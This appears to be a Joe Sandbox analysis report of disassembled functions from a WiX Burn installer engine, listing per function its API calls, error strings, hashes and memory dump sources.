Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`<u$package.cpp
API String ID: 336948655-2345112665
Opcode ID: ec476ec788d88f43d7a542e7a215e334dda2393973f82d5c1fd900654db6ae2e
Instruction ID: 0619a70f982ed8465a9de7ffea56b6b8fcf0827a4f4cbbfca458469bc28a28fd
Opcode Fuzzy Hash: ec476ec788d88f43d7a542e7a215e334dda2393973f82d5c1fd900654db6ae2e
Instruction Fuzzy Hash: 4A22BE75940209EFCF149F94CC8AFAEB7B6AB44314F21413DF516A7291DB71EE82AB10

Function 00C920A7 Relevance: 96.8, APIs: 28, Strings: 27, Instructions: 576
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00C920EB
_memset.LIBCMT ref: 00C920FD

Part of subcall function 00CC208E: GetModuleFileNameW.KERNEL32(00C9213E,?,00000104,?,00000104,?,00000000,?,?,00C9213E,?,00000000,?,?,?,76EEC3F0), ref: 00CC20AF

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000,?,?,?,76EEC3F0,?,00000000), ref: 00C9216E
GetLastError.KERNEL32(?,?,?,76EEC3F0,?,00000000), ref: 00C9217B

Strings

Failed to read complete image section header, index: %u, xrefs: 00C925A2
Failed to allocate buffer for section info., xrefs: 00C9265D
Failed to get path to engine process., xrefs: 00C92144
Failed to read complete section info., xrefs: 00C92741
Failed to get total size of bundle., xrefs: 00C9278D
Failed to seek to start of file., xrefs: 00C92209
Failed to find valid NT image header in buffer., xrefs: 00C92355
4, xrefs: 00C92605
(, xrefs: 00C924DD
Failed to read section info, data to short: %u, xrefs: 00C92629
Failed to read section info, unsupported version: %08x, xrefs: 00C92769
Failed to read DOS header., xrefs: 00C9225C
PE, xrefs: 00C92337
.wixburn, xrefs: 00C924ED
Failed to find Burn section., xrefs: 00C925C1
Failed to read section info., xrefs: 00C92717
Failed to open handle to engine process path: %ls, xrefs: 00C921AD
Failed to read signature offset., xrefs: 00C92400
Failed to seek past optional headers., xrefs: 00C924A8
Failed to read image section header, index: %u, xrefs: 00C9257D
Failed to read signature size., xrefs: 00C92453
Failed to read NT header., xrefs: 00C92324
Failed to find valid DOS image header in buffer., xrefs: 00C9228C
Failed to seek to NT header., xrefs: 00C922D4
section.cpp, xrefs: 00C9219D, 00C921FF, 00C92252, 00C92282, 00C922CA, 00C9231A, 00C9234B, 00C923A6, 00C923F6, 00C92449, 00C9249E, 00C9256D, 00C92592, 00C925B7, 00C92619, 00C92653, 00C926A4, 00C9270D, 00C92737, 00C9275C, 00C92830
Failed to seek to section info., xrefs: 00C923B0, 00C926AE
Failed to allocate memory for container sizes., xrefs: 00C9283A

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: File_memset$CreateErrorLastModuleName
String ID: ($.wixburn$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get path to engine process.$Failed to get total size of bundle.$Failed to open handle to engine process path: %ls$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$section.cpp
API String ID: 3151910114-3305245485
Opcode ID: 10e0d4d896a557310aa1ae593dbcdfa8763ff38da069ffd2f6bc58283330ada2
Instruction ID: ab1e74d6a927e85ae7cbc651e2446fea3897638b45c5758c5fe9b1248e02dbf2
Opcode Fuzzy Hash: 10e0d4d896a557310aa1ae593dbcdfa8763ff38da069ffd2f6bc58283330ada2
Instruction Fuzzy Hash: 7412B471A40226FBDF209BA5CC4AFAA7678AF04711F0101ADF949FA190DB74DE84DF91

Function 00CB5B21 Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 287
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,?,00CB634B), ref: 00CB5B33
GetLastError.KERNEL32(?,?,?,00CB634B), ref: 00CB5B3D
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00CB634B), ref: 00CB5B7B
GetLastError.KERNEL32(?,?,?,00CB634B), ref: 00CB5B86
ResetEvent.KERNEL32(?,?,?,?,00CB634B), ref: 00CB5BC2
GetLastError.KERNEL32(?,?,?,00CB634B), ref: 00CB5BCC

Strings

Failed to set file pointer to beginning of file., xrefs: 00CB5EAC
Failed to set operation complete event., xrefs: 00CB5B6C
Failed to create file: %ls, xrefs: 00CB5DD0
Failed to copy stream name: %ls, xrefs: 00CB5C54
Failed to set end of file., xrefs: 00CB5E65
cabextract.cpp, xrefs: 00CB5B62, 00CB5BAB, 00CB5BF1, 00CB5C1B, 00CB5D57, 00CB5DC3, 00CB5E15, 00CB5E5B, 00CB5EA2
Invalid operation for this state., xrefs: 00CB5C25
Failed to allocate buffer for stream., xrefs: 00CB5D61
Failed to wait for begin operation event., xrefs: 00CB5BB5
Failed to reset begin operation event., xrefs: 00CB5BFB
Failed to set file pointer to end of file., xrefs: 00CB5E1F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$Event$ObjectResetSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 1865021742-2104912459
Opcode ID: 834bbecbb4211184c5bd81a4f517e2a60404cb9d6893ea00cd3aeec1f50d8514
Instruction ID: 17ea4b98638cd96456fdbab2a9294a4968c57ad7aa20363ff24b508fddee4334
Opcode Fuzzy Hash: 834bbecbb4211184c5bd81a4f517e2a60404cb9d6893ea00cd3aeec1f50d8514
Instruction Fuzzy Hash: FF912772A81F23B7E72017A5CD1AFAA2E54AF00B61F150339FA25EB2D0D769DD0097D4

Function 00CB6864 Relevance: 35.2, APIs: 11, Strings: 9, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 00CB6889
#20.CABINET(00CB5F7D,00CB5F8C,00CB634F,00CB6556,00CB5F99,00CB6724,00CB65EB,000000FF,?), ref: 00CB68E5
CoUninitialize.OLE32 ref: 00CB6A91

Strings

Failed to initialize COM., xrefs: 00CB6895
Failed to set operation complete event., xrefs: 00CB69C6
<the>.cab, xrefs: 00CB6927
Failed to extract all files from container., xrefs: 00CB6983
Failed to initialize cabinet.dll., xrefs: 00CB6909
cabextract.cpp, xrefs: 00CB68FF, 00CB69BC, 00CB6A02, 00CB6A3F, 00CB6A66
Invalid operation for this state., xrefs: 00CB6A70
Failed to wait for begin operation event., xrefs: 00CB6A0C
Failed to reset begin operation event., xrefs: 00CB6A49

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container.$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-3821814080
Opcode ID: 25f93abcddc1eb0d8004e9b592cc5f5daa40ec984a52d12db8212b19a3a1ecfb
Instruction ID: 9f9e1d0854da0f0966574fd0bef37977f1c972939ca182577a9aa920a7a2823d
Opcode Fuzzy Hash: 25f93abcddc1eb0d8004e9b592cc5f5daa40ec984a52d12db8212b19a3a1ecfb
Instruction Fuzzy Hash: 17513C32E80621B7CB206AA5CC4AFEEB7A49F10B11F15423DF911B73E1DB789D019690

Function 00C9315E Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 183
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(8000FFFF,00000000,74DF3140,?,00C9398B,?,?,00000008,00000000,?), ref: 00C93175
ReadFile.KERNELBASE(00000008,00000008,00000004,?,00000000,?,00C9398B,?,?,00000008,00000000,?), ref: 00C93195
GetLastError.KERNEL32(?,00C9398B,?,?,00000008,00000000,?), ref: 00C9319B
ReadFile.KERNELBASE(00000008,00000000,00000008,?,00000000,00000000,00000009,?,00C9398B,?,?,00000008,00000000,?), ref: 00C9322B
GetLastError.KERNEL32(?,00C9398B,?,?,00000008,00000000,?), ref: 00C93231

Strings

Failed to read verification secret from parent pipe., xrefs: 00C93260
Failed to inform parent process that child is running., xrefs: 00C93341
Failed to read verification process id from parent pipe., xrefs: 00C932E5
Verification secret from parent is too big., xrefs: 00C931F7
pipe.cpp, xrefs: 00C931C0, 00C931EB, 00C93256, 00C9328C, 00C932DB, 00C93337, 00C93374
Verification secret from parent does not match., xrefs: 00C93298
Verification process id from parent does not match., xrefs: 00C93380
Failed to read size of verification secret from parent pipe., xrefs: 00C931CA
Failed to allocate buffer for verification secret., xrefs: 00C93213

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastRead$CurrentProcess
String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$pipe.cpp
API String ID: 1233551569-826945260
Opcode ID: 8e465cf303786b17a4f1fcfdb0ce3b04f4f5c2e6c9ce3d1a4848135ccd4ba785
Instruction ID: 4d6efbbd3f05eff53c446df5da83be0b1ac76d037daf3dd6aabd26cdab0f433d
Opcode Fuzzy Hash: 8e465cf303786b17a4f1fcfdb0ce3b04f4f5c2e6c9ce3d1a4848135ccd4ba785
Instruction Fuzzy Hash: EE51E372A8024AFBDF119B91CC8AFAE3A79EB40710F24403DF524E7091DB74CB059B61

Function 00C9AEAC Relevance: 31.8, APIs: 1, Strings: 20, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00C9222A,00000000,00C91D56,00C921E6), ref: 00C9AECC

Strings

WixBundleAction, xrefs: 00C9B508
WixBundleManufacturer, xrefs: 00C9B595
Failed to add built-in variable: %ls., xrefs: 00C9B619
WixBundleVersion, xrefs: 00C9B5B4
WixBundleCompressed, xrefs: 00C9B5CC
WixBundleInstalled, xrefs: 00C9B546
WixBundleTag, xrefs: 00C9B5A6
WixBundleActiveParent, xrefs: 00C9B56B
0, xrefs: 00C9AEDE
InstallerVersion, xrefs: 00C9B089
:, xrefs: 00C9B60B
InstallerName, xrefs: 00C9B06E
WixBundleElevated, xrefs: 00C9B55A
WixBundleProviderKey, xrefs: 00C9B584
$, xrefs: 00C9B4D1
WixBundleForcedRestartPackage, xrefs: 00C9B530
#, xrefs: 00C9AF2B
', xrefs: 00C9B0FC
LogonUser, xrefs: 00C9B0CB
Date, xrefs: 00C9AFC7

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$:$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleCompressed$WixBundleElevated$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleManufacturer$WixBundleProviderKey$WixBundleTag$WixBundleVersion
API String ID: 32694325-2150785980
Opcode ID: 301b98c0f36d46f4ec34dcc74d7fdae074429a0f2802d081eed51994024fa097
Instruction ID: 23d12ddac855f7c9b284add5d1efa5ac8033ca78b9276d67ce32f61448847973
Opcode Fuzzy Hash: 301b98c0f36d46f4ec34dcc74d7fdae074429a0f2802d081eed51994024fa097
Instruction Fuzzy Hash: EB127AB5C01628ABDF629F49D8493DDFBB6BB88304F4185DE96087B214C7B11B89CF85

Function 00CA13ED Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 139
registrywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsSetValue.KERNEL32(?,?), ref: 00CA1437
RegisterClassW.USER32(?), ref: 00CA1465
GetLastError.KERNEL32 ref: 00CA1470
CreateWindowExW.USER32(00000080,00CD4F80,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 00CA14E0
GetLastError.KERNEL32 ref: 00CA14EA
SetEvent.KERNEL32(?), ref: 00CA152D
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CA156C
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 00CA1591

Strings

WixBurnMessageWindow, xrefs: 00CA145E, 00CA158C
Unexpected return value from message pump., xrefs: 00CA1579
uithread.cpp, xrefs: 00CA149A, 00CA1514
Failed to create window., xrefs: 00CA151E
Failed to register window., xrefs: 00CA14A4

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ClassErrorLast$CreateEventMessageRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 367376830-288575659
Opcode ID: 9e95b52b69000b98cdcb158e06a04b0293629c81eab7043f24b916854d905cc9
Instruction ID: 6fb894a9c8b6f77cbfd443f2b272081db1be0781842520ec0a2572845eb9f19c
Opcode Fuzzy Hash: 9e95b52b69000b98cdcb158e06a04b0293629c81eab7043f24b916854d905cc9
Instruction Fuzzy Hash: 7B415FB194020AFFDB109FE4DC45FEDBBB8FB09314F284429E625E6160D7709E449B51

Function 00C938BE Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 158
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?), ref: 00C9391F
GetLastError.KERNEL32 ref: 00C93929
Sleep.KERNELBASE(00000064), ref: 00C9394E

Strings

Failed to allocate name of parent cache pipe., xrefs: 00C939C3
pipe.cpp, xrefs: 00C93965, 00C93A6A
\\.\pipe\%ls, xrefs: 00C938D0
Failed to allocate name of parent pipe., xrefs: 00C938E4
Failed to open companion process with PID: %u, xrefs: 00C93A77
Failed to verify parent pipe: %ls, xrefs: 00C93994
Failed to open parent pipe: %ls, xrefs: 00C93972
\\.\pipe\%ls.Cache, xrefs: 00C939AD

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CreateErrorFileLastSleep
String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
API String ID: 408151869-645222887
Opcode ID: 641736eb5b87086b8025a3557dde26d8bcb0ecf2d7f1e7f3e4b92b77f5bfde9c
Instruction ID: ceed7607b6b4aceb8d22579d781bc9ddc9f2f1bf7abc540c9f7fe2aea0fdb412
Opcode Fuzzy Hash: 641736eb5b87086b8025a3557dde26d8bcb0ecf2d7f1e7f3e4b92b77f5bfde9c
Instruction Fuzzy Hash: 3341F836540346FADF2196A2CD4EF6F76B59B80720F25402CF929E6190EB79DB40B610

Function 00C9D7D7 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00C9D7F2

Strings

Failed to get manifest stream from container., xrefs: 00C9D921
WixBundleOriginalSource, xrefs: 00C9D958
Failed to load catalog files., xrefs: 00C9D9D8
Failed to get unique temporary folder for bootstrapper application., xrefs: 00C9D997
WixBundleElevated, xrefs: 00C9D8A4, 00C9D8A9, 00C9D8BC
Failed to open manifest stream., xrefs: 00C9D900
Failed to set original source variable., xrefs: 00C9D969
Failed to extract bootstrapper application payloads., xrefs: 00C9D9B8
Failed to parse command line., xrefs: 00C9D871
Failed to load manifest., xrefs: 00C9D93D
Failed to open attached UX container., xrefs: 00C9D8E3
Failed to overwrite the %ls built-in variable., xrefs: 00C9D8BD
Failed to initialize variables., xrefs: 00C9D88F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$WixBundleElevated$WixBundleOriginalSource
API String ID: 2102423945-1257586656
Opcode ID: 5a4cca7210307fdc790dccc0c16a7cd74f908a4371e945d1243301a8b56f437e
Instruction ID: ee4bb1f9bce7ff8dcbd184c1ee3ea90911caee10c331c3b97dbf78cabc086dda
Opcode Fuzzy Hash: 5a4cca7210307fdc790dccc0c16a7cd74f908a4371e945d1243301a8b56f437e
Instruction Fuzzy Hash: B8613072940719AACF12EAA0C889FDB73BDAB54710F11452BF65BF7140EE30E64597A0

Function 00C9157C Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00C9174B
CloseHandle.KERNEL32(00000000,?,?,?,00C91DEA,?,?), ref: 00C91754

Part of subcall function 00C928E3: UuidCreate.RPCRT4(?), ref: 00C9291A
Part of subcall function 00C928E3: StringFromGUID2.OLE32(?,?,00000027), ref: 00C9292D

Strings

Failed to create the message window., xrefs: 00C916A1
Failed to launch unelevated process., xrefs: 00C915D6
Failed to pump messages from parent process., xrefs: 00C9171D
Failed to set elevated pipe into thread local storage for logging., xrefs: 00C91688
engine.cpp, xrefs: 00C91634, 00C9167E
Failed to allocate thread local storage for logging., xrefs: 00C9163E
Failed to connect to unelevated process., xrefs: 00C915F4
Failed to create implicit elevated connection name and secret., xrefs: 00C915AD

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseCreateFromHandleMutexReleaseStringUuid
String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create implicit elevated connection name and secret.$Failed to create the message window.$Failed to launch unelevated process.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$engine.cpp
API String ID: 3991521885-93479633
Opcode ID: ecb7dcaae4f1fe80ec69ccb4fc56b19886e4bf8fd11569d1c170de387bbc98fe
Instruction ID: 0e10240f5e5d45d46ff9e346992e7cfedafaee37303cd6bf754696689c45d2f2
Opcode Fuzzy Hash: ecb7dcaae4f1fe80ec69ccb4fc56b19886e4bf8fd11569d1c170de387bbc98fe
Instruction Fuzzy Hash: C1419272540607BADF229AE0CC4BFDB76ADEB84350F19453DFA5AD2150EF30EA05A724

Function 00CB0A63 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,00000000,00000000), ref: 00CB0AB5
GetLastError.KERNEL32 ref: 00CB0AC6
GetCurrentProcess.KERNEL32(00C91D72,00000000,00000000,00000002,00000000,00000000), ref: 00CB0B0F
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00CB0B15
DuplicateHandle.KERNELBASE(00000000), ref: 00CB0B18
GetLastError.KERNEL32 ref: 00CB0B22
SetFilePointerEx.KERNELBASE(00C91D72,00C9214A,00C91D72,00000000,00000000), ref: 00CB0B89
GetLastError.KERNEL32 ref: 00CB0B93

Strings

Failed to open container., xrefs: 00CB0BE4
Failed to duplicate handle to container: %ls, xrefs: 00CB0B59
Failed to move file pointer to container offset., xrefs: 00CB0BC7
container.cpp, xrefs: 00CB0AF0, 00CB0B4C, 00CB0BBD
Failed to open file: %ls, xrefs: 00CB0AFD

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp
API String ID: 2619879409-2168299741
Opcode ID: 7c756e94bb40819e9750ab3197932f15245f85e3c1dffd4808e9e222bc04b5b1
Instruction ID: cc367b5b857928a20d70c67e49fb6c49581438999bbfd33b27d26f1b30a9b1c4
Opcode Fuzzy Hash: 7c756e94bb40819e9750ab3197932f15245f85e3c1dffd4808e9e222bc04b5b1
Instruction Fuzzy Hash: E6416A71A4020AEFDB20DFA4CD86F9EB7B4FB04314F204529F625E6290D770AE10EB51

Function 00CB634F Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,000000FF,?,000000FF), ref: 00CB6381
GetCurrentProcess.KERNEL32(000000FF,00000000,00000000,00000000), ref: 00CB6399
GetCurrentProcess.KERNEL32(?,00000000), ref: 00CB639E
DuplicateHandle.KERNELBASE(00000000), ref: 00CB63A1
GetLastError.KERNEL32 ref: 00CB63AB
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000), ref: 00CB641A
GetLastError.KERNEL32 ref: 00CB6428

Strings

Failed to open cabinet file: %hs, xrefs: 00CB645A
<the>.cab, xrefs: 00CB6378
cabextract.cpp, xrefs: 00CB63D0, 00CB644D
Failed to add virtual file pointer for cab container., xrefs: 00CB63F8
Failed to duplicate handle to cab container., xrefs: 00CB63DA

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: 9ca122ec68422d2f9c5517c67397423ae1e693a89e64e97aca8afcb202be73da
